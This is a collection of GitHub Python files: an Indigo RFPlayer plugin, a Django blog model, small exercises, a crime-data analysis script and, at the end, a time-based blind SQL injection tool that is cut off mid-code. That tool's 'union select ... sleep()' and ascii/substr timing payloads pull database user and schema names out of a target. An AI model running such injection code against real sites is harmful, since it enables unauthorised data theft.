' + playerFrame['radioStatus']['band'][1]['i'][0][\n 'c']}\n ]\n self.logger.threaddebug(f'{player.device.name}: Updating states on server: {stateList}')\n indigo.devices[playerID].updateStatesOnServer(stateList)\n\n elif 'parrotStatus' in playerFrame:\n self.logger.debug(f\"{player.device.name}: parrotStatus frame received\")\n self.logger.threaddebug(\n f\"{player.device.name}: parrotStatus playerFrame:\\n{json.dumps(playerFrame, indent=4, sort_keys=True)}\")\n\n elif 'transcoderStatus' in playerFrame:\n self.logger.debug(f\"{player.device.name}: transcoderStatus frame received\")\n self.logger.threaddebug(\n f\"{player.device.name}: transcoderStatus playerFrame:\\n{json.dumps(playerFrame, indent=4, sort_keys=True)}\")\n\n elif 'alarmStatus' in playerFrame:\n self.logger.debug(f\"{player.device.name}: alarmStatus frame received\")\n self.logger.threaddebug(\n f\"{player.device.name}: alarmStatus playerFrame:\\n{json.dumps(playerFrame, indent=4, sort_keys=True)}\")\n\n elif 'frame' in playerFrame: # async frame. Find a device to handle it\n\n try:\n protocol = playerFrame['frame']['header']['protocol']\n if protocol in self.protocolClasses:\n devAddress = self.protocolClasses[protocol].frameCheck(player.device, playerFrame['frame'], self.knownDevices)\n\n if devAddress in self.sensorDevices:\n self.sensorDevices[devAddress].handler(playerFrame['frame'], self.knownDevices)\n\n else:\n self.logger.threaddebug(\n f\"{player.device.name}: Frame from {devAddress}, known and not configured. Ignoring.\")\n\n else:\n self.logger.debug(f\"{player.device.name}: Unknown protocol:\\n{json.dumps(playerFrame, indent=4, sort_keys=True)}\")\n\n except Exception as e:\n self.logger.debug(\n f\"{player.device.name}: Frame decode error:{str(e)}\\n{json.dumps(playerFrame, indent=4, sort_keys=True)}\")\n\n else:\n self.logger.debug(f\"{player.device.name}: Unknown playerFrame:\\n{json.dumps(playerFrame, indent=4, sort_keys=True)}\")\n\n self.sleep(0.1)\n\n except self.StopThread:\n for playerID, player in self.players.items():\n player.stop()\n\n ########################################\n # Plugin Preference Methods\n ########################################\n\n def validatePrefsConfigUi(self, valuesDict):\n errorDict = indigo.Dict()\n\n self.logLevel = int(self.pluginPrefs.get(\"logLevel\", logging.INFO))\n self.indigo_log_handler.setLevel(self.logLevel)\n\n if len(errorDict) > 0:\n return False, valuesDict, errorDict\n return True, valuesDict\n\n def closedPrefsConfigUi(self, valuesDict, userCancelled):\n if not userCancelled:\n self.logLevel = int(self.pluginPrefs.get(\"logLevel\", logging.INFO))\n self.indigo_log_handler.setLevel(self.logLevel)\n self.logger.debug(f\"RFPlayer logLevel = {self.logLevel}\")\n\n ########################################\n # Device Management Methods\n ########################################\n\n def didDeviceCommPropertyChange(self, origDev, newDev): # noqa\n if newDev.deviceTypeId == \"RFPlayer\":\n if origDev.pluginProps.get('serialPort', None) != newDev.pluginProps.get('serialPort', None):\n return True\n return False\n\n def deviceStartComm(self, device):\n\n self.logger.debug(f\"{device.name}: Starting Device\")\n\n instanceVers = int(device.pluginProps.get('devVersCount', 0))\n if instanceVers == kCurDevVersCount:\n self.logger.threaddebug(f\"{device.name}: Device is current version: {instanceVers:d}\")\n elif instanceVers < kCurDevVersCount:\n newProps = device.pluginProps\n newProps[\"devVersCount\"] = kCurDevVersCount\n device.replacePluginPropsOnServer(newProps)\n self.logger.debug(f\"{device.name}: Updated device version: {instanceVers:d} -> {kCurDevVersCount:d}\")\n else:\n self.logger.warning(f\"{device.name}: Invalid device version: {instanceVers:d}\")\n\n self.logger.threaddebug(f\"{device.name}: Starting Device: {device}\")\n\n if device.deviceTypeId == \"RFPlayer\":\n serialPort = device.pluginProps.get('serialPort', \"\")\n baudRate = int(device.pluginProps.get('baudRate', 0))\n player = RFPlayer(self, device)\n if player.start(serialPort, baudRate):\n self.players[device.id] = player\n device.updateStateOnServer(key='playerStatus', value='Starting')\n device.updateStateImageOnServer(indigo.kStateImageSel.SensorOff)\n else:\n device.updateStateOnServer(key='playerStatus', value='Error')\n device.updateStateImageOnServer(indigo.kStateImageSel.SensorTripped)\n\n elif device.deviceTypeId == \"discoveredDevice\":\n address = device.pluginProps.get('address', \"\")\n protocol = self.knownDevices[address]['protocol']\n self.sensorDevices[address] = (self.protocolClasses[protocol])(device, self.knownDevices)\n\n elif device.deviceTypeId == \"parrotDevice\":\n address = device.pluginProps.get('address', \"\")\n self.sensorDevices[address] = Parrot(device, self.knownDevices)\n\n elif device.deviceTypeId == \"x10Device\":\n address = device.pluginProps.get('address', \"\")\n self.sensorDevices[address] = X10(device, self.knownDevices)\n\n else:\n self.logger.warning(f\"{device.name}: Invalid device type: {device.deviceTypeId}\")\n\n self.logger.debug(f\"{device.name}: deviceStartComm complete, sensorDevices[] =\")\n for key, sensor in self.sensorDevices.items():\n self.logger.debug(f\"\\tkey = {key}, sensor.name = {sensor.device.name}, sensor.id = {sensor.device.id:d}\")\n\n def deviceStopComm(self, device):\n self.logger.debug(f\"{device.name}: Stopping Device\")\n if device.deviceTypeId == \"RFPlayer\":\n device.updateStateOnServer(key='playerStatus', value='Stopping')\n device.updateStateImageOnServer(indigo.kStateImageSel.SensorOff)\n player = self.players[device.id]\n player.stop()\n del self.players[device.id]\n else:\n address = device.pluginProps.get('address', \"\")\n try:\n del self.sensorDevices[address]\n except (Exception,):\n pass\n\n def deviceDeleted(self, device):\n indigo.PluginBase.deviceDeleted(self, device)\n\n if device.address:\n try:\n devices = self.knownDevices[device.address]['devices']\n devices.remove(device.id)\n self.knownDevices.setitem_in_item(device.address, 'devices', devices)\n self.knownDevices.setitem_in_item(device.address, 'status', \"Available\")\n self.logger.debug(f\"deviceDeleted: {device.name} ({device.id})\")\n except Exception as e:\n self.logger.error(f\"deviceDeleted error, {device.name}: {str(e)}\")\n\n ########################################\n\n def validateDeviceConfigUi(self, valuesDict, typeId, devId): # noqa\n if typeId == \"x10Device\":\n valuesDict['address'] = f\"X10-{valuesDict['houseCode']}{valuesDict['unitCode']}\"\n elif typeId == \"parrotDevice\":\n valuesDict['address'] = f\"PARROT-{valuesDict['houseCode']}{valuesDict['unitCode']}\"\n return True, valuesDict\n\n def closedDeviceConfigUi(self, valuesDict, userCancelled, typeId, devId):\n return\n\n # return a list of all \"Available\" devices (not associated with an Indigo device)\n\n def availableDeviceList(self, filter=\"\", valuesDict=None, typeId=\"\", targetId=0):\n retList = []\n for address, data in sorted(self.knownDevices.items()):\n if data['status'] == 'Available':\n retList.append((address, f\"{address}: {data['description']}\"))\n\n retList.sort(key=lambda tup: tup[1])\n return retList\n\n # return a list of all \"Active\" devices of a specific type\n\n def activeDeviceList(self, filter=\"\", valuesDict=None, typeId=\"discoveredDevice\", targetId=0):\n retList = []\n for address, data in sorted(self.knownDevices.items()):\n if data['status'] == 'Active' and (filter in address):\n retList.append((address, f\"{address}: {data['description']}\"))\n\n retList.sort(key=lambda tup: tup[1])\n return retList\n\n ########################################\n\n def triggerStartProcessing(self, trigger):\n self.logger.debug(f\"Adding Trigger {trigger.name} ({trigger.id:d})\")\n assert trigger.id not in self.triggers\n self.triggers[trigger.id] = trigger\n\n def triggerStopProcessing(self, trigger):\n self.logger.debug(f\"Removing Trigger {trigger.name} ({trigger.id:d})\")\n assert trigger.id in self.triggers\n del self.triggers[trigger.id]\n\n def triggerCheck(self, device):\n self.logger.threaddebug(f\"Checking Triggers for Device {device.name} ({device.id:d})\")\n\n for triggerId, trigger in sorted(self.triggers.items()):\n self.logger.threaddebug(f\"\\tChecking Trigger {trigger.name} ({trigger.id:d}), {trigger.pluginTypeId}\")\n\n if trigger.pluginProps[\"sensorID\"] != str(device.id):\n self.logger.threaddebug(f\"\\t\\tSkipping Trigger {trigger.name} ({trigger.id}), wrong device: {device.id}\")\n else:\n if trigger.pluginTypeId == \"sensorFault\":\n if device.states[\"faultCode\"]: # trigger if faultCode is not None\n self.logger.debug(f\"Executing Trigger {trigger.name} ({trigger.id})\")\n indigo.trigger.execute(trigger)\n else:\n self.logger.debug(f\"\\tNo Match for Trigger {trigger.name} ({trigger.id:d})\")\n else:\n self.logger.threaddebug(f\"\\tUnknown Trigger Type {trigger.name} ({trigger.id:d}), {trigger.pluginTypeId}\")\n\n ########################################\n # Control Action callbacks\n ########################################\n\n def actionControlUniversal(self, action, dev):\n if action.deviceAction == indigo.kUniversalAction.RequestStatus:\n sensor = self.sensorDevices[dev.address]\n player = self.players[sensor.player.id]\n sensor.requestStatus(player)\n\n def actionControlSensor(self, action, dev):\n sensor = self.sensorDevices[dev.address]\n player = self.players[sensor.player.id]\n\n self.logger.debug(f\"actionControlSensor: sensor = {sensor}, player = {player}, action = {action}\")\n\n if action.sensorAction == indigo.kDeviceAction.TurnOn:\n sendSuccess = sensor.turnOn(player)\n if sendSuccess:\n dev.updateStateOnServer(\"onOffState\", True)\n else:\n self.logger.error(f\"send '{dev.name}' 'On' failed\")\n\n elif action.sensorAction == indigo.kDeviceAction.TurnOff:\n sendSuccess = sensor.turnOff(player)\n if sendSuccess:\n dev.updateStateOnServer(\"onOffState\", False)\n else:\n self.logger.error(f\"send '{dev.name}' 'Off' failed\")\n\n else:\n self.logger.warning(f\"Unimplemented command in actionControlSensor: '{dev.name}' -> {action.sensorAction}\")\n\n def actionControlDevice(self, action, dev):\n sensor = self.sensorDevices[dev.address]\n player = self.players[sensor.player.id]\n\n self.logger.debug(f\"actionControlDevice: sensor = {sensor}, player = {player}, action = {action}\")\n\n if action.deviceAction == indigo.kDeviceAction.TurnOn:\n sendSuccess = sensor.turnOn(player)\n if sendSuccess:\n dev.updateStateOnServer(\"onOffState\", True)\n else:\n self.logger.error(f\"send '{dev.name}' 'On' failed\")\n\n elif action.deviceAction == indigo.kDeviceAction.TurnOff:\n sendSuccess = sensor.turnOff(player)\n if sendSuccess:\n dev.updateStateOnServer(\"onOffState\", False)\n else:\n self.logger.error(f\"send '{dev.name}' 'Off' failed\")\n\n else:\n self.logger.warning(f\"Unimplemented command in actionControlDevice: '{dev.name}' -> {action.deviceAction}\")\n\n ########################################\n # Plugin Actions object callbacks\n ########################################\n\n def validateActionConfigUi(self, valuesDict, typeId, devId): # noqa\n errorsDict = indigo.Dict()\n\n if len(errorsDict) > 0:\n return False, valuesDict, errorsDict\n return True, valuesDict\n\n def sendCommandAction(self, pluginAction, playerDevice, callerWaitingForResult):\n\n player = self.players[playerDevice.id]\n command = indigo.activePlugin.substitute(pluginAction.props[\"textString\"])\n\n try:\n self.logger.debug(f\"sendCommandAction command '{command}' to {playerDevice.name}\")\n player.sendRawCommand(command)\n except Exception as e:\n self.logger.exception(f\"sendCommandAction error: {e}\")\n\n def sendRTSMyCommand(self, pluginAction, callerWaitingForResult):\n\n sensorDevice = pluginAction.props[\"device\"]\n sensor = self.sensorDevices[sensorDevice]\n player = self.players[sensor.player.id]\n try:\n self.logger.debug(f\"sendRTSMyCommand to {sensorDevice} via {player.device.name}\")\n sensor.sendMyCommand(player)\n except Exception as e:\n self.logger.exception(f\"sendRTSMyCommand error: {e}\")\n\n def sendX10CommandAction(self, pluginAction, playerDevice, callerWaitingForResult):\n\n player = self.players[playerDevice.id]\n command = pluginAction.props[\"command\"]\n houseCode = pluginAction.props[\"houseCode\"]\n unitCode = pluginAction.props[\"unitCode\"]\n\n if command == \"DIM\":\n brightness = pluginAction.props[\"brightness\"]\n cmdString = f\"DIM {houseCode}{unitCode} X10 %{brightness}\"\n else:\n cmdString = f\"{command} {houseCode}{unitCode} X10\"\n\n try:\n self.logger.debug(f\"sendX10CommandAction command '{cmdString}' to {playerDevice.name}\")\n player.sendRawCommand(cmdString)\n except Exception as e:\n self.logger.exception(f\"sendX10CommandAction error: {e}\")\n\n def setFrequencyAction(self, pluginAction, playerDevice, callerWaitingForResult):\n\n player = self.players[playerDevice.id]\n band = pluginAction.props[\"freqBand\"]\n lowBand = pluginAction.props[\"lowBand\"]\n highBand = pluginAction.props[\"highBand\"]\n\n if band == \"H\":\n command = \"FREQ H \" + highBand\n elif band == \"L\":\n command = \"FREQ L \" + lowBand\n else:\n self.logger.warning(f\"setFrequencyAction: Unknown band '{band}'\")\n return\n\n try:\n self.logger.debug(f\"setFrequencyAction for {playerDevice.name}, band = {band}, lowBand = {lowBand}, highBand = {highBand} \")\n player.sendRawCommand(command)\n player.sendRawCommand(\"STATUS RADIO JSON\")\n except Exception as e:\n self.logger.exception(f\"setFrequencyAction error: {str(e)}\")\n\n ########################################\n # Menu Methods\n ########################################\n\n # doesn't do anything, just needed to force other menus to dynamically refresh\n def menuChanged(self, valuesDict, typeId, devId): # noqa\n return valuesDict\n\n def dumpKnownDevices(self):\n self.logger.info(f\"Known device list:\\n{self.knownDevices}\")\n\n def purgeKnownDevices(self):\n self.logger.info(\"Purging Known device list...\")\n for address, data in self.knownDevices.items():\n if data['status'] == 'Available':\n self.logger.info(f\"\\t{address}\")\n del self.knownDevices[address]\n\n def sendCommandMenu(self, valuesDict, typeId):\n try:\n deviceId = int(valuesDict[\"targetDevice\"])\n except (Exception,):\n self.logger.error(\"Bad Device specified for Send Command operation\")\n return False\n\n try:\n textString = valuesDict[\"textString\"]\n except (Exception,):\n self.logger.error(\"Bad text string specified for Send Command operation\")\n return False\n\n player = self.players[deviceId]\n command = indigo.activePlugin.substitute(textString)\n\n try:\n self.logger.debug(f\"sendCommandMenu command '{command}' to {indigo.devices[deviceId].name}\")\n player.sendRawCommand(command)\n except Exception as e:\n self.logger.exception(f\"sendCommandMenu error: {e}\")\n\n return True\n\n @staticmethod\n def pickSensor(filter=None, valuesDict=None, typeId=0, targetId=0):\n retList = []\n for device in indigo.devices.iter(\"self\"):\n if device.deviceTypeId != \"RFPlayer\":\n retList.append((device.id, device.name))\n retList.sort(key=lambda tup: tup[1])\n return retList\n\n @staticmethod\n def pickPlayer(filter=None, valuesDict=None, typeId=0, targetId=0):\n retList = []\n for device in indigo.devices.iter(\"self\"):\n if device.deviceTypeId == \"RFPlayer\":\n retList.append((device.id, device.name))\n retList.sort(key=lambda tup: tup[1])\n return retList\n\n @staticmethod\n def pickPlayerDevice(filter=None, valuesDict=None, typeId=0, targetId=0):\n retList = []\n for device in indigo.devices.iter(\"self\"):\n if device.deviceTypeId == \"RFPlayer\":\n retList.append((device.id, device.name))\n retList.sort(key=lambda tup: tup[1])\n return retList\n\n def getRFBands(self, filter=None, valuesDict=None, typeId=0, targetId=0):\n rfPlayer = indigo.devices[targetId]\n playerType = rfPlayer.pluginProps[u'playerModel']\n self.logger.debug(f\"getRFBands for {rfPlayer.name} ({playerType})\")\n\n if playerType == \"US\":\n return [(\"H\", \"310/315MHz Band\"), (\"L\", \"433Mhz Band\")]\n elif playerType == \"EU\":\n return [(\"H\", \"868MHz Band\"), (\"L\", \"433Mhz Band\")]\n\n self.logger.error(f\"Unknown playerType = {playerType} in getRFBands\")\n return None\n\n def getHighBands(self, filter=None, valuesDict=None, typeId=0, targetId=0):\n rfPlayer = indigo.devices[targetId]\n playerType = rfPlayer.pluginProps['playerModel']\n self.logger.debug(f\"getHighBands for {rfPlayer.name} ({playerType})\")\n\n if playerType == \"US\":\n return [(\"0\", \"Off\"), (\"310000\", \"310MHz - X10 RF\"), (\"315000\", \"315MHz - Visonic\")]\n elif playerType == \"EU\":\n return [(\"0\", \"Off\"), (\"868350\", \"868.350MHz\"), (\"868950\", \"868.950MHz\")]\n\n self.logger.error(f\"Unknown playerType = {playerType} in getHighBands\")\n return None\n\n def getLowBands(self, filter=None, valuesDict=None, typeId=0, targetId=0):\n rfPlayer = indigo.devices[targetId]\n playerType = rfPlayer.pluginProps[u'playerModel']\n self.logger.debug(f\"getLowBands for {rfPlayer.name} ({playerType})\")\n\n if playerType == \"US\":\n return [(\"0\", \"Off\"), (\"433420\", \"433.420Mhz - Somfy RTS\"), (\"433920\", \"433.920Mhz - Most 433MHz devices\")]\n elif playerType == \"EU\":\n return [(\"0\", \"Off\"), (\"433420\", \"433.420Mhz\"), (\"433920\", \"433.920Mhz\")]\n\n self.logger.error(f\"Unknown playerType = {playerType} in getLowBands\")\n return None\n","repo_name":"FlyingDiver/Indigo-RFPlayer","sub_path":"RFPlayer.indigoPlugin/Contents/Server Plugin/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":24216,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"17775452007","text":"from django.db import models\nfrom django.utils.translation import gettext_lazy as _\nfrom django.db.models import Avg\nfrom django.contrib.auth import get_user_model\n\nfrom core_apps.common.models import TimeStampedUUIDModel\nfrom core_apps.ratings.models import Rating\n\nfrom .read_time_engine import ArticleReadEngine\n\nfrom autoslug import AutoSlugField\n\nUser = get_user_model()\n\ndef upload_to(instance, filename):\n filename = str(instance.id) + filename\n return 'banner_images/{filename}'.format(filename=filename)\n\nclass Tag(TimeStampedUUIDModel):\n tag = models.CharField(max_length=20, blank=True)\n slug = AutoSlugField(populate_from=\"tag\", db_index=True, unique=True)\n\n class Meta:\n verbose_name_plural = \"Tags\"\n \n def __str__(self):\n return self.tag\n \nclass Article(TimeStampedUUIDModel):\n author = models.ForeignKey(User, verbose_name=_(\"Author\"), related_name=\"articles\", on_delete=models.CASCADE)\n\n title = models.CharField(verbose_name=_(\"Title\"), max_length=50)\n\n slug = AutoSlugField(populate_from=\"title\", always_update=True, unique=True)\n \n description = models.CharField(verbose_name=_(\"Description\"), max_length=150)\n\n body = models.TextField(verbose_name=_(\"Content\"))\n\n banner_image = models.ImageField(verbose_name=_(\"Banner\"), default=\"/banner_default.jpg\", upload_to = upload_to)\n\n tags = models.ManyToManyField(Tag, related_name=\"articles\", blank=True)\n\n views = models.IntegerField(verbose_name=_(\"Article's views\"), default=0)\n\n def __str__(self) -> str:\n return f\"{self.author}'s article\"\n \n def list_of_tags(self):\n tag_list= [relation.tag for relation in self.tags.all()] # tags.all() will give the list of all tags that are in relationship with Tag class\n return tag_list\n \n def article_read_time(self):\n time_to_read = ArticleReadEngine(self) # self is the current article obj\n return time_to_read.get_read_time()\n \n @property\n def get_average_rating(self):\n if Rating.objects.all() > 0:\n rating = Rating.objects.filter(article=self.pkid).all().aggregate(Avg(\"value\")) # rating will now be a single obj\n print(\"\\n\\n\\n\\n\\n\\n\\n\\n\",rating, \"\\n\\n\\n\\n\\n\")\n return round(rating['value__avg'],1) if rating['value__avg'] else 0\n return 0\n\n \nclass ArticleViews(TimeStampedUUIDModel):\n ip = models.CharField(max_length=38, verbose_name=_(\"IP Address\"))\n article = models.ForeignKey(Article, verbose_name=_(\"Views\"), on_delete=models.CASCADE)\n\n def __str__(self) -> str:\n return f\"{self.article.title} is having {self.article.views} view(s).\"\n \n class Meta:\n verbose_name = \"Total views on Article\"\n verbose_name_plural = \"Total Article Views\"\n","repo_name":"dev08math/dynamic-blog-api","sub_path":"core_apps/articles/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"29037849779","text":"\"\"\"here we see about the scope of the vars and\r\nglobal keyword is for only fully global vars\r\n\"\"\"\r\n\r\n# a = 5\r\n# def func():\r\n# # you have to specify in function that var is global or local both can't work\r\n# #print(a)\r\n# #a = 23\r\n# global a\r\n# a += 12\r\n# print(a)\r\n#\r\n# func()\r\n# print(a)\r\n\r\ndef ram():\r\n x = 23\r\n def shyam():\r\n global x\r\n x = 32\r\n print(x)\r\n print(x)\r\n shyam()\r\n print(x)\r\nram()\r\nprint(x)","repo_name":"vijendra21vijendra/python","sub_path":"scopethings.py","file_name":"scopethings.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17487468749","text":"\r\n#please complete code by using chaos theory and allow to optimize lambda parameter with a possible revision of output quality\r\n#Certainly! Here's an updated version of the code that incorporates chaos theory and allows optimization of the lambda parameter:\r\n\r\n#```\r\nimport re\r\nimport random\r\nimport numpy as np\r\nfrom scipy.optimize import minimize_scalar\r\n\r\n\r\ndef generate_text(corpus, n, lambd):\r\n words = re.findall(r'\\w+', corpus.lower())\r\n markov_dict = {}\r\n for i in range(len(words) - n):\r\n key = tuple(words[i:i+n])\r\n if key in markov_dict:\r\n markov_dict[key].append(words[i+n])\r\n else:\r\n markov_dict[key] = [words[i+n]]\r\n seed = random.randint(0, len(words) - n)\r\n seed_words = words[seed:seed+n]\r\n result = \" \".join(seed_words)\r\n for i in range(100):\r\n key = tuple(seed_words)\r\n if key in markov_dict:\r\n possible_words = markov_dict[key]\r\n weights = np.array([markov_dict[(key)].count(w) for w in possible_words])\r\n probs = weights / weights.sum()\r\n chaos = np.random.rand()\r\n if chaos < lambd:\r\n next_word = random.choice(possible_words)\r\n else:\r\n next_word = np.random.choice(possible_words, p=probs)\r\n result += \" \" + next_word\r\n seed_words = seed_words[1:] + [next_word]\r\n else:\r\n break\r\n return result.capitalize() + \".\"\r\n\r\n\r\ndef objective(lambd, corpus, n):\r\n text = generate_text(corpus, n, lambd)\r\n score = len(set(text.split())) / len(text.split())\r\n return -score\r\n\r\n\r\ncorpus = \"The quick brown fox jumps over the lazy dog.\"\r\nn = 2\r\nres = minimize_scalar(objective, args=(corpus, n))\r\nlambd = res.x\r\nprint(\"Optimal lambda parameter:\", lambd)\r\nprint(\"Generated text:\")\r\nprint(generate_text(corpus, n, lambd))\r\n#```\r\n\r\n#In this updated code, I've added a new parameter `lambd` which controls the chaos factor in the Markov Chain model. The `generate_text` function now calculates the probability distribution of the possible next words based on their frequency in the Markov Chain, and then uses the chaos factor to randomly choose between the most likely word and a randomly selected word from the distribution.\r\n\r\n#The `objective` function is a new helper function that takes the `lambd` parameter and the input text, and generates a text using the `generate_text` function. It then calculates a score based on the ratio of unique words to total words in the generated text, and returns the negative of that score (since we want to maximize the score).\r\n\r\n#The `minimize_scalar` function from the `scipy.optimize` library is then used to find the optimal value of `lambd` that maximizes the score returned by the `objective` function.\r\n\r\n#Finally, the optimal value of `lambd` is printed along with the generated text using the `generate_text` function with the optimal value of `lambd`.\r\n\r\n#This updated code allows the user to optimize the chaos factor to balance between generating text that is too repetitive or too random. The optimization process can take some time depending on the size of the input text and the value of `n`, but it can significantly improve the quality of the generated text.\r\n","repo_name":"Sarmentor/CAOS-EXPERIMENTS","sub_path":"GENERATION MARKOV MODEL/chatGPT-GEN-MODEL-MARKOV-CHAOS.py","file_name":"chatGPT-GEN-MODEL-MARKOV-CHAOS.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9644617652","text":"from functools import lru_cache\n\n\ndef load_data(filename):\n with open(filename, 'r') as f:\n for line in f:\n yield line.strip()\n\n\nSNAFU = {'0': 0, '1': 1, '2': 2, '=': -2, '-': -1}\nSNAFU_KEYS = ['0', '1', '2', '=', '-']\n\n\n@lru_cache\ndef radix_5_to_10(snafu):\n result = 0\n for c in snafu:\n result = result * 5 + SNAFU[c]\n return int(result)\n\n\n@lru_cache\ndef radix_10_to_5(n):\n if n == 0:\n return '0'\n result = ''\n while n > 0:\n n, r = divmod(n, 5)\n result = SNAFU_KEYS[r] + result\n if r > 2:\n # if snafu == '-' or '=' then overflow\n n = n + 1\n return result\n\n\nif __name__ == '__main__':\n short = False\n\n if short:\n filename = 'input.short.txt'\n else:\n filename = 'input.txt'\n\n part_1_sum = 0\n for line in load_data(filename):\n part_1_sum += radix_5_to_10(line)\n\n # part 1\n print('radix 10 sum:', part_1_sum)\n part_1 = radix_10_to_5(part_1_sum)\n print('SNAFU:', part_1) # 2=020-===0-1===2=020\n","repo_name":"kobzarvs/adventofcode","sub_path":"src/2022/day25/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22777490863","text":"# Import necessary libraries/modules\nimport os # Import the 'os' module for working with file paths and directories\nimport pandas as pd # Import the 'pandas' library for data manipulation\nimport matplotlib.pyplot as plt # Import 'matplotlib.pyplot' for data visualization\nimport seaborn as sns # Import 'seaborn' for enhanced data visualization\nimport folium as fl # Import 'folium' for creating interactive maps\n\n# 1. Load Data\ncsv_file_path = \"/Users/muhammadfauzy/Documents/1. FOLDER KERJAAN/1. Data Analyst /2. DataSet/DataSet - CRIME IN LA PROJECT/crime_in_la.csv\"\ndelimiter = ',' # Define the delimiter used in the CSV file\ndata = pd.read_csv(csv_file_path, sep=delimiter) # Read the CSV data into a Pandas DataFrame\n\n# 2. Display After Load\nprint(\"First 5 rows of the DataFrame:\")\nprint(data.head(5)) # Display the first 5 rows of the loaded DataFrame\n\n# Calculate summary statistics\nsummary_stats = data.describe(percentiles=[0.25, 0.5, 0.75])\nprint(summary_stats) # Display summary statistics of the data\n\n# Identify missing values\nmissing_values = data.isna().sum()\nprint(\"Missing Values:\")\nprint(missing_values) # Display the count of missing values in each column\n\n# Check data types\ndata_types = data.dtypes\nprint(\"Data Types:\")\nprint(data_types) # Display data types of columns\n\n# 3. Remove Missing rows\ndata_cleaned = data.dropna(subset=[\"Premis Desc\"]) # Remove rows with missing values in the \"Premis Desc\" column\nprint(\"First 5 rows of the cleaned DataFrame:\")\nprint(data_cleaned.head(5)) # Display the first 5 rows of the cleaned DataFrame\n\n# Check missing values in the cleaned data\nmissing_values_cleaned = data_cleaned.isna().sum()\nprint(\"Missing Values in Cleaned Data:\")\nprint(missing_values_cleaned) # Display missing values in the cleaned data\n\n# 4. Data Visualization\n# Create a histogram of victim ages\nplt.hist(data['Vict Age'], bins=20, edgecolor='k')\nplt.xlabel('Age')\nplt.ylabel('Frequency')\nplt.title('Distribution of Victim Ages')\nplt.show()\n\n# Create a countplot of crime counts by area name\nplt.figure(figsize=(12, 6))\nsns.countplot(x='AREA NAME', data=data, order=data['AREA NAME'].value_counts().index)\nplt.xticks(rotation=90)\nplt.xlabel('Area Name')\nplt.ylabel('Crime Count')\nplt.title('Crime Counts by Area')\nplt.show()\n\n# Create a scatter plot of crime locations\nplt.figure(figsize=(10, 6))\nplt.scatter(data['LON'], data['LAT'], alpha=0.5, c='b')\nplt.xlabel('Longitude')\nplt.ylabel('Latitude')\nplt.title('Crime Locations in LA')\nplt.show()\n\n# Create a boxplot of crime code distribution by area name\nplt.figure(figsize=(12, 6))\nsns.boxplot(x='AREA NAME', y='Crm Cd', data=data)\nplt.xticks(rotation=90)\nplt.xlabel('Area Name')\nplt.ylabel('Crime Code')\nplt.title('Crime Code Distribution by Area')\nplt.show()\n\n# Continue with additional code...\n","repo_name":"Untamed98x/Unveiling-Crime-Trends-in-Lost-Angeles","sub_path":"LAProject.py","file_name":"LAProject.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29970117775","text":"# /usr/bin/env python3.6\n# coding=utf8\n\nimport sys\nimport time\nimport math\nimport logging\nimport requests\n\n\ndef get(url):\n\t\"\"\"\n\t发出一个GET请求,返回从发出请求到接到响应消耗的秒数\n\t\"\"\"\n\tlogging.info('[*] GET {}'.format(url))\n\tstart_time = time.time()\n\tr = requests.get(url=url, timeout=TIME_OUT)\n\tif r.status_code != 200:\n\t\tlogging.warn('The url {} returns {}'.format(url, r.status_code))\n\tduration = time.time() - start_time\n\treturn duration\n\n\ndef is_right(response_time):\n\t\"\"\"\n\t根据HTTP请求响应时间判断SQL是否正确执行\n\t\"\"\"\n\tif (response_time - base_time) > 0.8*DELAY:\n\t\treturn True\n\telse:\n\t\treturn False\n\n\ndef is_vulnerability(target):\n\t\"\"\"\n\t确定目标是否存在注入漏洞\n\t\"\"\"\n\tglobal base_time\n\tbase_time = get(target.format(VALUE))\n\tcrosses = ['\"', '\")' '\"))', '\\'', '\\')', '\\'))']\n\tpayload = ' union select 1,2,sleep({}) '.format(DELAY)\n\tfor cross in crosses:\n\t\tif is_right(get(target.format(VALUE + cross + payload + COMMENT))):\n\t\t\tlogging.info('[+] SQL injection vulnerability exists, cross boundary symbol is `{}`.'.format(cross))\n\t\t\tbreak\n\telse:\n\t\tcross = None\n\t\tlogging.fatal('[-] No SQL injection vulnerability exists.')\n\treturn cross\n\n\ndef get_data_by_time(target, cross, select):\n\t\"\"\"\n\t通过查询数据\n\t\"\"\"\n\treal_values = str()\n\tunion_select = ' union select 1,2, if(ascii(substr(({}), {{}}, 1)) <= {{}}, sleep({}), 1)'.format(select, DELAY)\n\n\tn = 1\n\twhile True:\n\t\tmax_value = 127\n\t\tmin_value = 0\n\n\t\tif is_right(get(target.format(cross + union_select.format(n, min_value) + COMMENT))):\n\t\t\tbreak\n\t\tif not is_right(get(target.format(cross + union_select.format(n, max_value) + COMMENT))):\t\n\t\t\tbreak\n\n\t\twhile min_value < max_value-1:\n\t\t\tmiddle_value = math.ceil((max_value+min_value)/2)\n\n\t\t\tif is_right(get(target.format(cross + union_select.format(n, middle_value) + COMMENT))):\n\t\t\t\tmax_value = middle_value\n\t\t\telse:\n\t\t\t\tmin_value = middle_value\n\n\t\tif is_right(get(target.format(cross + union_select.format(n, max_value) + COMMENT))):\n\t\t\treal_value = max_value\n\t\telse:\n\t\t\treal_value = min_value\n\n\t\treal_values += chr(real_value)\n\t\tn += 1\n\n\treturn real_values\n\n\ndef main(target):\n\t\"\"\"\n\t对目标进行基于时间的SQL盲注\n\t\"\"\"\n\t# 检查是否有注入漏洞\n\tcross = is_vulnerability(target)\n\tif cross is None:\n\t\texit(-1)\n\n\n\t# 返回用户名\n\tselect = 'select user()'\n\tuser = get_data_by_time(target, cross, select)\n\tprint('{}: {}'.format(select, user))\n\n\t# 返回数据库名\n\tselect = 'select database()'\n\tdatabase = get_data_by_time(target, cross, select)\n\tprint('{}: {}'.format(select, database))\n\n\t# 